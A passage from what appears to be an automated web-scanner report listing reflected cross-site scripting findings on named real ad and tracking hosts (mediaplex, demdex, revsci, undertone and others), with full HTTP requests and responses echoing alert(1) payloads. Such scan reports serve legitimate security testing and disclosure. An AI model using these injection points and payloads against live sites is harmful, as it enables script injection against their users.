GET /d1.aspx?p6(ct1&cd53i99&fCampaigns_Local_Audience~1=Consumer!)[]&i=44b386<script>alert(1)</script>7f5ba6a478e&banner=Button_180x90_Image HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 2097
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:57 GMT
Date: Fri, 30 Sep 2011 13:28:57 GMT
Connection: close

if (typeof (CspCampaigns) == "undefined") {
function CspCampaign(id, banner, url, weight, date, sid, sname) {
this._banner = banner;
this._url = url;
this._weight = weight;
...[SNIP]...
n(instance) {
if (typeof (this.collection[instance]) != "undefined")
return this.collection[instance];
else return null;
}
};
}

CspCampaigns.Init("44b386<script>alert(1)</script>7f5ba6a478e", "1");


(function(collection, instance) {
var c = new CspCampaign("Micr_BackToSchool_Res_Cus_Con", "https://12.contentcastsyndication.com/FTP/Campaign/Microsoft/Micr_BackToSchool_Res_Con/en/Bann
...[SNIP]...

2.82. http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/d1.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com
Path:   /d1.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6287f<script>alert(1)</script>1bd61670098 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d1.aspx?p6(ct1&cd53i99&fCampaigns_Local_Audience~1=Consumer!)[]&i=4&banner=Button_180x90_Image&6287f<script>alert(1)</script>1bd61670098=1 HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1977
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:59 GMT
Date: Fri, 30 Sep 2011 13:28:59 GMT
Connection: close

if (typeof (CspCampaigns) == "undefined") {
function CspCampaign(id, banner, url, weight, date, sid, sname) {
this._banner = banner;
this._url = url;
this._weight = weight;
...[SNIP]...


if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "d1.aspx?p6(ct1&cd53i99&fCampaigns_Local_Audience~1=Consumer!)[]&i=4&banner=Button_180x90_Image&6287f<script>alert(1)</script>1bd61670098=1";
$$.scriptMap[scriptname].ready = true;
$$.scriptMap[scriptname].retObj = {id: "4", l: "EN", fb: 1?false:true};
if ($$.scriptMap[scriptname].retObj.fb)

...[SNIP]...

2.83. http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com/d1.aspx [p6(ct1&cd53i99&fCampaigns_Local_Audience~1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com
Path:   /d1.aspx

Issue detail

The value of the p6(ct1&cd53i99&fCampaigns_Local_Audience~1 request parameter is copied into the HTML document as plain text between tags. The payload 111e5<script>alert(1)</script>05fadee4a8c was submitted in the p6(ct1&cd53i99&fCampaigns_Local_Audience~1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d1.aspx?p6(ct1&cd53i99&fCampaigns_Local_Audience~1=Consumer!)[]111e5<script>alert(1)</script>05fadee4a8c&i=4&banner=Button_180x90_Image HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i4.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1974
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:57 GMT
Date: Fri, 30 Sep 2011 13:28:57 GMT
Connection: close

if (typeof (CspCampaigns) == "undefined") {
function CspCampaign(id, banner, url, weight, date, sid, sname) {
this._banner = banner;
this._url = url;
this._weight = weight;
...[SNIP]...
tance);
})(CspCampaigns, "4");


if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "d1.aspx?p6(ct1&cd53i99&fCampaigns_Local_Audience~1=Consumer!)[]111e5<script>alert(1)</script>05fadee4a8c&i=4&banner=Button_180x90_Image";
$$.scriptMap[scriptname].ready = true;
$$.scriptMap[scriptname].retObj = {id: "4", l: "EN", fb: 1?false:true};
if ($$.script
...[SNIP]...

2.84. http://dm.demdex.net/event [d_cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.demdex.net
Path:   /event

Issue detail

The value of the d_cb request parameter is copied into the HTML document as plain text between tags. The payload a571b<script>alert(1)</script>71c1322f356 was submitted in the d_cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event?d_cts=1&d_rtbd=json&d_cb=dm_hr1.cba571b<script>alert(1)</script>71c1322f356&d_ld=u%3Dcat-homepage_scat-_sscat-_art-_dmd-E13079BE-D40D-4198-904A-AB1F1FD694DD HTTP/1.1
Host: dm.demdex.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.golflink.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: demdex=84885339654854577282732069350312039190; dextp=mm-1316941619389

Response

HTTP/1.1 200 OK
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
DCS: LA-ZD-DCS2 1.3.6
Set-Cookie: dm=84885339654854577282732069350312039190;Path=/;Domain=.dm.demdex.net;Expires=Wed, 29-Sep-2021 23:20:41 GMT
Expires: Thu, 01 Jan 2009 00:00:00 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
Pragma: no-cache
Set-Cookie: DexLifeCycle=MA==|MTgxNzE9MToxMDAyLDE4Mzk0PTE6MTAwMg==|MA==|MjE1NCwyMTYz|MA==|MA==|MTgzOTQtMA==;Path=/;Domain=.dm.demdex.net;Expires=Wed, 29-Sep-2021 23:20:41 GMT
Content-Length: 119
Server: Jetty(7.2.2.v20101205)

dm_hr1.cba571b<script>alert(1)</script>71c1322f356({"dpm":[],"traits":[18171,18394],"segments":[2154,2163],"stuff":[]})

2.85. http://img.mediaplex.com/content/0/9957/135309/V2ADFSuiteOffer_300x250.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/9957/135309/V2ADFSuiteOffer_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 408a2"-alert(1)-"cf91719389d was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/9957/135309/V2ADFSuiteOffer_300x250.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F9957-135309-39180-13%3Fmpt%3D1751319346408a2"-alert(1)-"cf91719389d&mpt=1751319346&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBoBCy3L-FTvHEH5XCjQTDurXqDMbdqN0BAAAAEAEgvMC4CjgAWM6T-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEUaHR0cDovL3BhcmFkaXpvLmNvbS_gAQOYArgXqQLlM4-yNKa2PsACAuACAOoCGVBhcmFkaXpvX01haW5fQlRGXzMwMHgyNTD4AvDRHpADpAOYA8gGqAMB4AQBoAYW%2526num%253D0%2526sig%253DAOD64_1qSnl_BNUf1OMZ2P7FFtslkPT5lQ%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=MzVL75e1zU+SbbSPEgPAw8dbQn9naNeui58EFmLMN3RH0OWsg2EOhtXrA1DMltPIeLZK2Rji9asBknRl4wa8au5uhOqusjLj5JA31k0YkbA=! HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:11:31 GMT
Server: Apache
Last-Modified: Thu, 08 Sep 2011 12:09:14 GMT
ETag: "848edb-f6a-4ac6ceddd6e80"
Accept-Ranges: bytes
Content-Length: 6396
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("adfarm.mediaplex.com%2Fad%2Fck%2F9957-135309-39180-13%3Fmpt%3D1751319346408a2"-alert(1)-"cf91719389d");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("adfarm.mediaplex.com%2Fad%2Fck%2F9957-135309-39180-13%3Fmpt%3D1751319346408a2"-alert(1)-"cf91719389d");
mpck =
...[SNIP]...

2.86. http://img.mediaplex.com/content/0/9957/135309/V2ADFSuiteOffer_300x250.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/9957/135309/V2ADFSuiteOffer_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92de9'%3balert(1)//d70de080a38 was submitted in the mpck parameter. This input was echoed as 92de9';alert(1)//d70de080a38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/9957/135309/V2ADFSuiteOffer_300x250.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F9957-135309-39180-13%3Fmpt%3D175131934692de9'%3balert(1)//d70de080a38&mpt=1751319346&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBoBCy3L-FTvHEH5XCjQTDurXqDMbdqN0BAAAAEAEgvMC4CjgAWM6T-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEUaHR0cDovL3BhcmFkaXpvLmNvbS_gAQOYArgXqQLlM4-yNKa2PsACAuACAOoCGVBhcmFkaXpvX01haW5fQlRGXzMwMHgyNTD4AvDRHpADpAOYA8gGqAMB4AQBoAYW%2526num%253D0%2526sig%253DAOD64_1qSnl_BNUf1OMZ2P7FFtslkPT5lQ%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=MzVL75e1zU+SbbSPEgPAw8dbQn9naNeui58EFmLMN3RH0OWsg2EOhtXrA1DMltPIeLZK2Rji9asBknRl4wa8au5uhOqusjLj5JA31k0YkbA=! HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:11:33 GMT
Server: Apache
Last-Modified: Thu, 08 Sep 2011 12:09:14 GMT
ETag: "848edb-f6a-4ac6ceddd6e80"
Accept-Ranges: bytes
Content-Length: 6402
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
tp://ad.afy11.net/ad?c=MzVL75e1zU SbbSPEgPAw8dbQn9naNeui58EFmLMN3RH0OWsg2EOhtXrA1DMltPIeLZK2Rji9asBknRl4wa8au5uhOqusjLj5JA31k0YkbA=!http://adfarm.mediaplex.com/ad/ck/9957-135309-39180-13?mpt=175131934692de9';alert(1)//d70de080a38" target="_blank">
...[SNIP]...

2.87. http://img.mediaplex.com/content/0/9957/135309/V2ADFSuiteOffer_300x250.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/9957/135309/V2ADFSuiteOffer_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81ede'%3balert(1)//4f0b75b5a2b was submitted in the mpvc parameter. This input was echoed as 81ede';alert(1)//4f0b75b5a2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/9957/135309/V2ADFSuiteOffer_300x250.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F9957-135309-39180-13%3Fmpt%3D1751319346&mpt=1751319346&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBoBCy3L-FTvHEH5XCjQTDurXqDMbdqN0BAAAAEAEgvMC4CjgAWM6T-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEUaHR0cDovL3BhcmFkaXpvLmNvbS_gAQOYArgXqQLlM4-yNKa2PsACAuACAOoCGVBhcmFkaXpvX01haW5fQlRGXzMwMHgyNTD4AvDRHpADpAOYA8gGqAMB4AQBoAYW%2526num%253D0%2526sig%253DAOD64_1qSnl_BNUf1OMZ2P7FFtslkPT5lQ%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=MzVL75e1zU+SbbSPEgPAw8dbQn9naNeui58EFmLMN3RH0OWsg2EOhtXrA1DMltPIeLZK2Rji9asBknRl4wa8au5uhOqusjLj5JA31k0YkbA=!81ede'%3balert(1)//4f0b75b5a2b HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:11:58 GMT
Server: Apache
Last-Modified: Thu, 08 Sep 2011 12:09:14 GMT
ETag: "848edb-f6a-4ac6ceddd6e80"
Accept-Ranges: bytes
Content-Length: 6398
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
NUf1OMZ2P7FFtslkPT5lQ%26client%3Dca-pub-8612080020341542%26adurl%3Dhttp://ad.afy11.net/ad?c=MzVL75e1zU SbbSPEgPAw8dbQn9naNeui58EFmLMN3RH0OWsg2EOhtXrA1DMltPIeLZK2Rji9asBknRl4wa8au5uhOqusjLj5JA31k0YkbA=!81ede';alert(1)//4f0b75b5a2bhttp://adfarm.mediaplex.com/ad/ck/9957-135309-39180-13?mpt=1751319346" target="_blank">
...[SNIP]...

2.88. http://img.mediaplex.com/content/0/9957/135309/V2ADFSuiteOffer_300x250.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/9957/135309/V2ADFSuiteOffer_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 825fc"%3balert(1)//be72da98ff was submitted in the mpvc parameter. This input was echoed as 825fc";alert(1)//be72da98ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/9957/135309/V2ADFSuiteOffer_300x250.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F9957-135309-39180-13%3Fmpt%3D1751319346&mpt=1751319346&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBoBCy3L-FTvHEH5XCjQTDurXqDMbdqN0BAAAAEAEgvMC4CjgAWM6T-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEUaHR0cDovL3BhcmFkaXpvLmNvbS_gAQOYArgXqQLlM4-yNKa2PsACAuACAOoCGVBhcmFkaXpvX01haW5fQlRGXzMwMHgyNTD4AvDRHpADpAOYA8gGqAMB4AQBoAYW%2526num%253D0%2526sig%253DAOD64_1qSnl_BNUf1OMZ2P7FFtslkPT5lQ%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=MzVL75e1zU+SbbSPEgPAw8dbQn9naNeui58EFmLMN3RH0OWsg2EOhtXrA1DMltPIeLZK2Rji9asBknRl4wa8au5uhOqusjLj5JA31k0YkbA=!825fc"%3balert(1)//be72da98ff HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:11:56 GMT
Server: Apache
Last-Modified: Thu, 08 Sep 2011 12:09:14 GMT
ETag: "848edb-f6a-4ac6ceddd6e80"
Accept-Ranges: bytes
Content-Length: 6394
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
NUf1OMZ2P7FFtslkPT5lQ%26client%3Dca-pub-8612080020341542%26adurl%3Dhttp://ad.afy11.net/ad?c=MzVL75e1zU SbbSPEgPAw8dbQn9naNeui58EFmLMN3RH0OWsg2EOhtXrA1DMltPIeLZK2Rji9asBknRl4wa8au5uhOqusjLj5JA31k0YkbA=!825fc";alert(1)//be72da98ff");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBoBCy3L-FTvHEH5XCjQTDurXqDMbdqN0BAAAAEAEgvMC4CjgAWM6T-qwZYMnW-obIo6AZ
...[SNIP]...

2.89. http://inbrwsvc01.inenvi.com/SightMaxAgentInterface/agentinterfacejsonp.svc/site/GetVisitorAgentSessionMonitorCommand [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://inbrwsvc01.inenvi.com
Path:   /SightMaxAgentInterface/agentinterfacejsonp.svc/site/GetVisitorAgentSessionMonitorCommand

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5c269<script>alert(1)</script>61dcaa6cf08 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /SightMaxAgentInterface/agentinterfacejsonp.svc/site/GetVisitorAgentSessionMonitorCommand?callback=jsonp13173888142595c269<script>alert(1)</script>61dcaa6cf08&accountDataBaseID=1&websiteDataBaseID=4&browserID=09dea098-99bc-4e50-83c1-48afddef2037&sessionID=31d30622-26b1-4c15-af43-779166ac675a HTTP/1.1
Host: inbrwsvc01.inenvi.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.myllc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SmartMaxUser=09dea098-99bc-4e50-83c1-48afddef2037; SmartMaxSession=31d30622-26b1-4c15-af43-779166ac675a

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 113
Date: Fri, 30 Sep 2011 13:23:34 GMT
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET

jsonp13173888142595c269<script>alert(1)</script>61dcaa6cf08( {"GetVisitorAgentSessionMonitorCommandResult":40} );

2.90. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 24d43<script>alert(1)</script>7ade89ebd9d was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=F0874724d43<script>alert(1)</script>7ade89ebd9d HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.allgetaways.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Fri, 30 Sep 2011 13:11:13 GMT
Cache-Control: max-age=86400, private
Expires: Sat, 01 Oct 2011 13:11:13 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:11:13 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "F0874724D43<SCRIPT>ALERT(1)</SCRIPT>7ADE89EBD9D" was not recognized.
*/

2.91. http://link.undertone.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.undertone.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93418"-alert(1)-"e802c81b2e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=160x600&entity=334534&site_code=359&section_code=20735&93418"-alert(1)-"e802c81b2e9=1 HTTP/1.1
Host: link.undertone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://ad.fr.doubleclick.net/adi/han.ab/qp%7Cfrance%7Cprovence-alpes-c%C3%B4te_dazur%7Cprovence-alpes-c%C3%B4te_dazur;ptype=qp;lang=fr;site=fr;owner=false;n1=france;n2=provence-alpes-c%C3%B4te_dazur;n3=null;n4=null;n5=null;n6=null;ref=hax;pos=atf;sz=120x600,160x600;tile=2;mtfifpath=/ad-iframe-scripts/doubleclick/;ord=6682509?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A28X=0

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:17:16 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Fri, 30 Sep 2011 13:17:16 GMT
Pragma: no-cache
Content-Length: 4337
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://link.undertone.com/imp?93418"-alert(1)-"e802c81b2e9=1&Z=160x600&e=334534&S=20735&I=359&_salt=2617475387";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_
...[SNIP]...

2.92. http://my.soft32.com/json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.soft32.com
Path:   /json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 2bdd9<script>alert(1)</script>48bc918d485 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?callback=_jqjsp2bdd9<script>alert(1)</script>48bc918d485&_1317389461804= HTTP/1.1
Host: my.soft32.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.soft32.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=19999335.903154346.1317389446.1317389446.1317389446.1; __utmb=19999335.1.10.1317389446; __utmc=19999335; __utmz=19999335.1317389446.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
